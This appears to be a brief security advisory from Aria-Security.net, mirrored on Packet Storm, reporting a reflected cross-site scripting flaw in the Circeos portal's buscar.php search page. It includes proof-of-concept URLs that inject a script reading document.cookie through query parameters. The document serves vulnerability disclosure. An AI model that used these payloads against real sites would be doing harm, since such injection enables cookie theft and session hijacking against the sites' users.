Cireos Portal from SirceOS suffers from XSS in buscar.php.
169593e65366f35f19f969828b67320a1a5f9e01937f74356a6ed66526c26adf#Aria-Security.net Advisory
#Discovered by: O.u.t.l.a.w
#< www.Aria-security.net>
#Gr33t to: A.u.r.a & R@1D3N & Smok3r
#-----------------------------------------------------------
Software: SirceOS Operative Solutions
Link: http://www.circeos.it
Attack method: Cross Site Scripting
advisory:http://www.aria-security.net/portal/circeos.txt
Summary:
cireos is a powerfull Portal and featuring a forum
Proof of Concept:
http://www.victim.com/circeos_path/forum/buscar.php?query=<script>alert(document.cookie)</script><!--
www.site.com/path/index.php?page=<script>alert(document.cookie)</script><!--
Tested On
http://www.circeos.it/forum/index.php
Solution
contact me: Advisory@Aria-Security.net
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed